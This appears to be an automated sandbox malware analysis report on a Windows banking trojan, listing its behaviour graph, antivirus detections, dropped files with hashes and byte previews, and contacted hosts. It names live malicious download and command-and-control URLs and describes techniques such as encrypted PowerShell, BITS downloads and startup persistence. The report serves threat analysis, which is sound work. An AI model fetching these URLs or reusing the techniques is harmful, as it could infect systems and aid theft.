DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
BITS Jobs
Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
Process Injection
/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
Services File Permissions Weakness
Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1578839 Sample: PVKDyWHOaX.exe Startdate: 20/12/2024 Architecture: WINDOWS Score: 100 36 site.webmailcontabilidadecrx.net 2->36 52 Malicious sample detected (through community Yara rule) 2->52 54 Multi AV Scanner detection for dropped file 2->54 56 Multi AV Scanner detection for submitted file 2->56 58 7 other signatures 2->58 8 PVKDyWHOaX.exe 1 2->8         started        11 Nvidia-75619.exe 2->11         started        13 svchost.exe 1 1 2->13         started        signatures3 process4 dnsIp5 64 Malicious encrypted Powershell command line found 8->64 66 Encrypted powershell cmdline option found 8->66 68 Bypasses PowerShell execution policy 8->68 16 powershell.exe 44 8->16         started        70 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 11->70 40 site.webmailcontabilidadecrx.net 34.95.215.169, 443, 49712, 49718 GOOGLEUS United States 13->40 42 127.0.0.1 unknown unknown 13->42 signatures6 process7 file8 30 C:30vidia-75619\play.exe, PE32 16->30 dropped 32 C:32vidia-7561932vidia-75619.exe (copy), PE32 16->32 dropped 34 C:\Users\user\AppData\...34vidia-75619.lnk, MS 16->34 dropped 44 Powershell uses Background Intelligent Transfer Service (BITS) 16->44 46 Found suspicious powershell code related to unpacking or dynamic code loading 16->46 48 Loading BitLocker PowerShell Module 16->48 50 Powershell drops PE file 16->50 20 Nvidia-75619.exe 1 16->20         started        24 WmiPrvSE.exe 16->24         started        26 conhost.exe 16->26         started        28 2 other processes 16->28 signatures9 process10 dnsIp11 38 23.94.207.151, 49770, 80 AS-COLOCROSSINGUS United States 20->38 60 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 20->60 62 Switches to a custom stack to bypass stack traces 20->62 signatures12

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
PVKDyWHOaX.exe25%VirustotalBrowse
PVKDyWHOaX.exe26%ReversingLabs
PVKDyWHOaX.exe100%Joe Sandbox ML
SourceDetectionScannerLabelLink
C:\Nvidia-75619\Nvidia-75619.exe (copy)24%ReversingLabsWin32.Trojan.Ousaban
C:\Nvidia-75619\play.exe24%ReversingLabsWin32.Trojan.Ousaban
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
site.webmailcontabilidadecrx.net
34.95.215.169
truefalse
    unknown
    NameMaliciousAntivirus DetectionReputation
    https://site.webmailcontabilidadecrx.net/notafiscal/download/cat.zipfalse
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      https://site.webmailcontabilidadecrx.net/notafiscal/download/cat.zipesvchost.exe, 00000006.00000002.3641776541.0000016231C61000.00000004.00000020.00020000.00000000.sdmpfalse
        unknown
        http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.4644760639.0000021F10074000.00000004.00000800.00020000.00000000.sdmpfalse
          high
          https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000002.00000002.4592726963.0000021F00225000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.4592726963.0000021F00225000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.4592726963.0000021F00225000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                http://23.94.207.151/Nvidia-75619.exe, 00000009.00000003.3099082671.0000000001683000.00000004.00000020.00020000.00000000.sdmpfalse
                  unknown
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.4592726963.0000021F00225000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://contoso.com/Licensepowershell.exe, 00000002.00000002.4644760639.0000021F10074000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://contoso.com/Iconpowershell.exe, 00000002.00000002.4644760639.0000021F10074000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://crl.ver)svchost.exe, 00000006.00000002.3641498496.0000016231C0F000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 00000006.00000003.2197003075.0000016231AD0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.drfalse
                            high
                            http://www.microsoft.Apowershell.exe, 00000002.00000002.4663430952.0000021F6B070000.00000004.00000020.00020000.00000000.sdmpfalse
                              unknown
                              http://www.indyproject.org/Nvidia-75619.exe, 0000000B.00000003.2603014519.0000000005410000.00000004.00001000.00020000.00000000.sdmp, Nvidia-75619.exe, 0000000B.00000002.2606119470.0000000001CAB000.00000040.10000000.00040000.00000000.sdmpfalse
                                high
                                https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.4592726963.0000021F00225000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://g.live.com/odclientsettings/Prod/C:edb.log.6.drfalse
                                    high
                                    https://site.webmailcontabilidadecrx.net/notafiscal/receive_info.phppowershell.exe, 00000002.00000002.4592726963.0000021F00225000.00000004.00000800.00020000.00000000.sdmpfalse
                                      unknown
                                      https://site.webmailcontabilidadecrx.net:443/notafiscal/download/cat.zipsvchost.exe, 00000006.00000002.3641776541.0000016231C85000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3641776541.0000016231C61000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.4592726963.0000021F00225000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://contoso.com/powershell.exe, 00000002.00000002.4644760639.0000021F10074000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.4644760639.0000021F10074000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://site.webmailcontabilidadecrx.net/r.dllsvchost.exe, 00000006.00000002.3641776541.0000016231C85000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                https://aka.ms/pscore68powershell.exe, 00000002.00000002.4592726963.0000021F00001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.4592726963.0000021F00001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://23.94.207.151/avs_pro/index.phpNvidia-75619.exe, 00000009.00000003.3098974236.0000000001659000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      unknown
                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs
                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      23.94.207.151
                                                      unknownUnited States
                                                      36352AS-COLOCROSSINGUSfalse
                                                      34.95.215.169
                                                      site.webmailcontabilidadecrx.netUnited States
                                                      15169GOOGLEUSfalse
                                                      IP
                                                      127.0.0.1
                                                      Joe Sandbox version:41.0.0 Charoite
                                                      Analysis ID:1578839
                                                      Start date and time:2024-12-20 15:27:10 +01:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 9m 26s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:12
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:PVKDyWHOaX.exe
                                                      renamed because original name is a hash value
                                                      Original Sample Name:07b5b4156d1f3adbb7728ba7a7d538af04e7cca8e396a19f5446bb2043a6e3db.exe
                                                      Detection:MAL
                                                      Classification:mal100.bank.evad.winEXE@13/16@1/3
                                                      EGA Information:
                                                      • Successful, ratio: 50%
                                                      HCA Information:
                                                      • Successful, ratio: 64%
                                                      • Number of executed functions: 17
                                                      • Number of non-executed functions: 1
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe
                                                      • Override analysis time to 240s for powershell
                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                      • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.175.87.197
                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                      • Execution Graph export aborted for target PVKDyWHOaX.exe, PID 6412 because it is empty
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                      TimeTypeDescription
                                                      09:28:12API Interceptor11536355x Sleep call for process: powershell.exe modified
                                                      09:28:16API Interceptor3x Sleep call for process: svchost.exe modified
                                                      09:28:46API Interceptor8154x Sleep call for process: Nvidia-75619.exe modified
                                                      15:28:45AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Nvidia-75619.lnk
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      23.94.207.151tTdMHr6SlJ.dllGet hashmaliciousUnknownBrowse
                                                      • 23.94.207.151/avs_coin/index.php
                                                      e5mIhMkcj5.exeGet hashmaliciousUnknownBrowse
                                                      • 23.94.207.151/avs_pro/index.php
                                                      No context
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      AS-COLOCROSSINGUStTdMHr6SlJ.dllGet hashmaliciousUnknownBrowse
                                                      • 23.94.207.151
                                                      e5mIhMkcj5.exeGet hashmaliciousUnknownBrowse
                                                      • 23.94.207.151
                                                      arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                      • 107.174.209.17
                                                      uctgkfb7.exeGet hashmaliciousXWormBrowse
                                                      • 192.210.175.202
                                                      file.exeGet hashmaliciousRemcosBrowse
                                                      • 107.173.4.16
                                                      SwiftCopy_PaymtRecpt121228.exeGet hashmaliciousRemcosBrowse
                                                      • 192.210.150.17
                                                      Document.xlaGet hashmaliciousUnknownBrowse
                                                      • 172.245.123.12
                                                      greatnicefeatureswithsupercodebnaturalthingsinlineforgiven.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                      • 23.95.235.29
                                                      sweetnesswithgreatnessiwthbestthingswithmebackickmegreatthings.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                      • 23.95.235.29
                                                      createdbetterthingswithgreatnressgivenmebackwithnice.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                      • 172.245.123.12
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      28a2c9bd18a11de089ef85a160da29e4http://senalongley.comGet hashmaliciousUnknownBrowse
                                                      • 34.95.215.169
                                                      ghostspider.7zGet hashmaliciousUnknownBrowse
                                                      • 34.95.215.169
                                                      Doc_14-58-28.jsGet hashmaliciousUnknownBrowse
                                                      • 34.95.215.169
                                                      Doc_14-58-28.jsGet hashmaliciousUnknownBrowse
                                                      • 34.95.215.169
                                                      F8HYX5HOgA.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                      • 34.95.215.169
                                                      tmkSAOF3GM.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                      • 34.95.215.169
                                                      JiZQEd33mn.exeGet hashmaliciousUnknownBrowse
                                                      • 34.95.215.169
                                                      urS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                                                      • 34.95.215.169
                                                      https://walli.shanga.co/image/view/?id=1375Get hashmaliciousUnknownBrowse
                                                      • 34.95.215.169
                                                      Doc_16-48-43.jsGet hashmaliciousUnknownBrowse
                                                      • 34.95.215.169
                                                      No context
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                      Category:dropped
                                                      Size (bytes):8635355
                                                      Entropy (8bit):7.9998512032284195
                                                      Encrypted:true
                                                      SSDEEP:196608:7rj2hoZ9EmTAPP1ZqdCI6EbEWw6kGGW3tk8Y4spTW:7WoZ9EyYZ9ImWopq
                                                      MD5:4FD14CD23A12A7B1A106165A15C57694
                                                      SHA1:8102A8EDB0412DF19C624B1EFDE306456A837826
                                                      SHA-256:5BF7A221A454CC6E6EC1B87D0C370E55C72DA57D3A2635100B5BA84FE6E7D5E3
                                                      SHA-512:7E0EF66E879772CD21A05658EC3F26419A7E3C5334D8FBD1E73BEE69FF45E2466AEA82CF9CF332A3995CB4F9AA125F667179C4A832DD2679FEDCB47BDA42EB68
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:PK........;!.Y*..YE..........play.exe.eT.....3. ....Bp....A......<....{.$h...<$..wKXf..s.}..o..;.@........ye.. .....w...m.......?..Rw..M.c.m.*c..`.7.gW'kW3..s3GG'w...4...46.4.jZ4.N..\88.......*...o...... "`!.2...o....!.'..=...q.`...P..........S..`~...F........_.A........|.....8..g.m.>....o_ub{..2..x._...-.......m....aSM.\-....V....?..>........<.K.^.Z.o...........;..".-....$.=....L.R.?.>.Q....._.....c.?.5 ..d....^p.Z.;...e.../.....'.....'/..5...-|...._.5p./...........+:Lb.U.4.SO~S."t)...&........E._....9..@y.}....5.....h..V}..hL. ...$d^T...~..~.*....C.........0 ......m..H?...p..@.....S!..J.o7.~.|......w..S|.BNH.A.V....B.......p|*~c%...%?...F....T%M....;O.9y.77.4.....Z*..`H....H.V.S.......`W.d....%6.,...XlF..gv.s...(.......i.;pulO...8......~....Q.f..D9..~DX=......M.yy.P...=.xa.....7..$6...Fw..Q.wi.5j..}h._.Ho.U.TN..Y.mGyf..)....Tn...PLjq.g.....vf4_.......k.lt.d.}......%.*...O.{B...R-n.'...^.......F'y.....R{...T.0..t.6`.z....P..qtSdtb).....
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):8816544
                                                      Entropy (8bit):7.993493827980054
                                                      Encrypted:true
                                                      SSDEEP:196608:q8NN2mvIbRvnSZkIeQZ8eYMa46OdXxVQIB:qeN2uOnRIIehVQ4
                                                      MD5:D11828146FF9E2E340C555F9531CAC47
                                                      SHA1:CA027CA9BEA1E48A0AC4D01370D3F4BC9D5E5088
                                                      SHA-256:48590573F48E243DEA35B018401933E3B5CBC19EDB94377C7D54394F127E214C
                                                      SHA-512:2305B6B9A5B530651B33958093B96CCDBEE63D03530A082C39C94809278458658FACA472B66A090493928EC26F6E3D28C8BA278FAF6AC9CB7AFC8AB70A918779
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 24%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...1..e...............&.....H......m........ ....@.......................................@.................................8|u......@..y5...........^...)...........................................:..@.............g.0............................text............................... ..`.rdata..@.... ......................@..@.data........0......................@....!Zx......f..@...................... ..`.]#m....H.....g.....................@....2"V....`.... g..................... ..`.rsrc...y5...@...6...$..............@..@.reloc...............Z..............@..B................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                      Category:dropped
                                                      Size (bytes):8635355
                                                      Entropy (8bit):7.9998512032284195
                                                      Encrypted:true
                                                      SSDEEP:196608:7rj2hoZ9EmTAPP1ZqdCI6EbEWw6kGGW3tk8Y4spTW:7WoZ9EyYZ9ImWopq
                                                      MD5:4FD14CD23A12A7B1A106165A15C57694
                                                      SHA1:8102A8EDB0412DF19C624B1EFDE306456A837826
                                                      SHA-256:5BF7A221A454CC6E6EC1B87D0C370E55C72DA57D3A2635100B5BA84FE6E7D5E3
                                                      SHA-512:7E0EF66E879772CD21A05658EC3F26419A7E3C5334D8FBD1E73BEE69FF45E2466AEA82CF9CF332A3995CB4F9AA125F667179C4A832DD2679FEDCB47BDA42EB68
                                                      Malicious:false
                                                      Preview:PK........;!.Y*..YE..........play.exe.eT.....3. ....Bp....A......<....{.$h...<$..wKXf..s.}..o..;.@........ye.. .....w...m.......?..Rw..M.c.m.*c..`.7.gW'kW3..s3GG'w...4...46.4.jZ4.N..\88.......*...o...... "`!.2...o....!.'..=...q.`...P..........S..`~...F........_.A........|.....8..g.m.>....o_ub{..2..x._...-.......m....aSM.\-....V....?..>........<.K.^.Z.o...........;..".-....$.=....L.R.?.>.Q....._.....c.?.5 ..d....^p.Z.;...e.../.....'.....'/..5...-|...._.5p./...........+:Lb.U.4.SO~S."t)...&........E._....9..@y.}....5.....h..V}..hL. ...$d^T...~..~.*....C.........0 ......m..H?...p..@.....S!..J.o7.~.|......w..S|.BNH.A.V....B.......p|*~c%...%?...F....T%M....;O.9y.77.4.....Z*..`H....H.V.S.......`W.d....%6.,...XlF..gv.s...(.......i.;pulO...8......~....Q.f..D9..~DX=......M.yy.P...=.xa.....7..$6...Fw..Q.wi.5j..}h._.Ho.U.TN..Y.mGyf..)....Tn...PLjq.g.....vf4_.......k.lt.d.}......%.*...O.{B...R-n.'...^.......F'y.....R{...T.0..t.6`.z....P..qtSdtb).....
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):8816544
                                                      Entropy (8bit):7.993493827980054
                                                      Encrypted:true
                                                      SSDEEP:196608:q8NN2mvIbRvnSZkIeQZ8eYMa46OdXxVQIB:qeN2uOnRIIehVQ4
                                                      MD5:D11828146FF9E2E340C555F9531CAC47
                                                      SHA1:CA027CA9BEA1E48A0AC4D01370D3F4BC9D5E5088
                                                      SHA-256:48590573F48E243DEA35B018401933E3B5CBC19EDB94377C7D54394F127E214C
                                                      SHA-512:2305B6B9A5B530651B33958093B96CCDBEE63D03530A082C39C94809278458658FACA472B66A090493928EC26F6E3D28C8BA278FAF6AC9CB7AFC8AB70A918779
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 24%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...1..e...............&.....H......m........ ....@.......................................@.................................8|u......@..y5...........^...)...........................................:..@.............g.0............................text............................... ..`.rdata..@.... ......................@..@.data........0......................@....!Zx......f..@...................... ..`.]#m....H.....g.....................@....2"V....`.... g..................... ..`.rsrc...y5...@...6...$..............@..@.reloc...............Z..............@..B................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):8192
                                                      Entropy (8bit):0.35999246155449205
                                                      Encrypted:false
                                                      SSDEEP:6:6xxoaaD0JOCEfMuaaD0JOCEfMKQmDCxxoaaD0JOCEfMuaaD0JOCEfMKQmD:DaaD0JcaaD0JwQQraaD0JcaaD0JwQQ
                                                      MD5:9D38BAA557CE15013F1C0F9D24EE6A05
                                                      SHA1:5CBFA4B6BC90409EF39207805B0ACDA3975F96F0
                                                      SHA-256:EA379B38955E54E853F49CCEDEBBC46FDF152F9CA42F11FFE0993313ECADF5FC
                                                      SHA-512:BF0026314228DBC452C63D1A77EBAD5BCD245E1F698F179FE1409E339ECA8A1F1797F35ED885D0DA4F007A9B8FE1CD19E7C9FF74E11C08C8A6433C79A03BD874
                                                      Malicious:false
                                                      Preview:*.>.................D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):1310720
                                                      Entropy (8bit):0.8551049611374555
                                                      Encrypted:false
                                                      SSDEEP:1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDugS:gJjJGtpTq2yv1AuNZRY3diu8iBVqFc
                                                      MD5:1A1E0F5D86A6828EC2B85542BDF2BCEB
                                                      SHA1:308E1AAFED06B2E2CE4AB4F21A09D81E6363CAF0
                                                      SHA-256:C66440F7B9B4295FF4DCCBBC2906CAD592DE595E42B6E9207004AC185D7ED592
                                                      SHA-512:BF91B611A241177C77611D278419D0E4C83A8BA52B5C9B4F7945A14CEA4884A544DA3C090559DCA7DA86A2C6D4D6EF3C0E9099C88D3329623AFBC3ACA47944C1
                                                      Malicious:false
                                                      Preview:...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0x75fc4d96, page size 16384, Windows version 10.0
                                                      Category:dropped
                                                      Size (bytes):1310720
                                                      Entropy (8bit):0.6586133983026365
                                                      Encrypted:false
                                                      SSDEEP:1536:RSB2ESB2SSjlK/e0r+0/T1B0CZSJbYkr3g16v2UPkLk+kGPnSnC0uznx0M1Dn/dF:RazaQ0qKA2UEHDnAPZ4PZf9h/9h
                                                      MD5:926607FCF4EAA748469AB7B983DA7660
                                                      SHA1:978D83CE8EC96BB73E4E096B643E70220E18152D
                                                      SHA-256:49727C30401E9B080E27AA8DD3561F4C6930C3D298A609CFF8456B0D184F1AAC
                                                      SHA-512:13DC7B8CB784B006CFB99203EAFAF6A8C8B53A235E5198C5C3699401AB9B674115A1332965BC9C22A44C113F8DC8DEF68D92FD14D581B4068C5CBD09FF6A6510
                                                      Malicious:false
                                                      Preview:u.M.... ...............X\...;...{......................,............|.......|..h.|..........|..,...........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{..................................`.v2.....|....................s......|...........................#......,.......................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:OpenPGP Secret Key
                                                      Category:dropped
                                                      Size (bytes):16384
                                                      Entropy (8bit):0.07923272080976676
                                                      Encrypted:false
                                                      SSDEEP:3:SXUetYeCivwKlXGpZQvHKirxoX/RSlXallRCttl/QoeP/ll:wz9oKIK/KifQ23+t
                                                      MD5:C90CD13DD9D124E5A898156612FAAF5D
                                                      SHA1:BE74A1DB5DA98B75011F9A56E692B9BE7FBA9F10
                                                      SHA-256:D2381ADA064B9D4D4BA35C9415ADC6D99B5E8EC831BB1B4B0917879E5EAD297C
                                                      SHA-512:6A2391E9481AEFE17FB7CEFA70FCBBA024A20D20498177E556F5F1027FF97DF4529CB3F45480A9DC5132B080AC3DFDB4E78C81935F811AFE293C7E18A920BF02
                                                      Malicious:false
                                                      Preview:.e.b.....................................;...{.......|.......|...............|.......|...a6......|....................s......|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):38390
                                                      Entropy (8bit):5.059388817260858
                                                      Encrypted:false
                                                      SSDEEP:768:/dbV3IpNBQkj2Uh4iUx1frRJv5FPvlOZhK/CardFUJQOdB4tAHkLNZzNKe1MlYod:/dbV3CNBQkj2Uh4iUx1flJnPvlOHqdyp
                                                      MD5:9F70B5322FE68080ED7EC6F098FC7E35
                                                      SHA1:D96DE9832FC19E0C064D815A661B5051A0E21B2E
                                                      SHA-256:9A07A01804D669EF0BFFB4D32E70AC2A9E0E8847E588C509545CF7CE143BE216
                                                      SHA-512:3EAC7709ABE9D7F157EC77A8FA2C1B9D83E510984C4E50BF18FAD7B0A8E1564DF7753B6CC0EA42103E64F573C5C74B83D70AEBCC2E492404D7D137B27AEAFEE0
                                                      Malicious:false
                                                      Preview:PSMODULECACHE.7...m.\3.z..q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1........Set-DAEntryPointTableItem....#...Set-DAClientExperienceConfiguration...."...Enable-DAManualEntryPointSelection........Get-DAEntryPointTableItem........Reset-DAEntryPointTableItem....%...Reset-DAClientExperienceConfiguration........Remove-DAEntryPointTableItem........New-DAEntryPointTableItem....#...Get-DAClientExperienceConfiguration....#...Disable-DAManualEntryPointSelection........Rename-DAEntryPointTableItem.........)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScr
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
